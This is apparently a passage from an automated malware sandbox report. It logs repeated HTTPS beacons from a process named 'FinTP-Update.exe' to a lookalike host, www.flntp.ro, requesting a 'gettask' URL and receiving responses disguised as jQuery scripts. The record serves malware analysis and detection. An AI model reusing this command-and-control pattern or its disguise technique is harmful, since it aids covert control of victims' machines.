                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:11 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:11 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:11 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            26192.168.2.5498503.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:13 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:13 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:13 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:13 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            27192.168.2.5498563.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:15 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:16 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:15 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:16 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            28192.168.2.5498623.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:17 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:18 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:18 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5649
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:18 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            29192.168.2.5498683.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:19 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:20 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:20 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:20 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            30192.168.2.5498743.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:21 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:22 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:22 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:22 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            31192.168.2.5498803.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:24 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:24 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:24 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:24 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            32192.168.2.5498863.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:26 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:27 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:26 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:27 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            33192.168.2.5498923.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:28 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:29 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:29 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:29 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            34192.168.2.5498983.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:30 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:31 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:31 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:31 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            35192.168.2.5499053.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:33 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
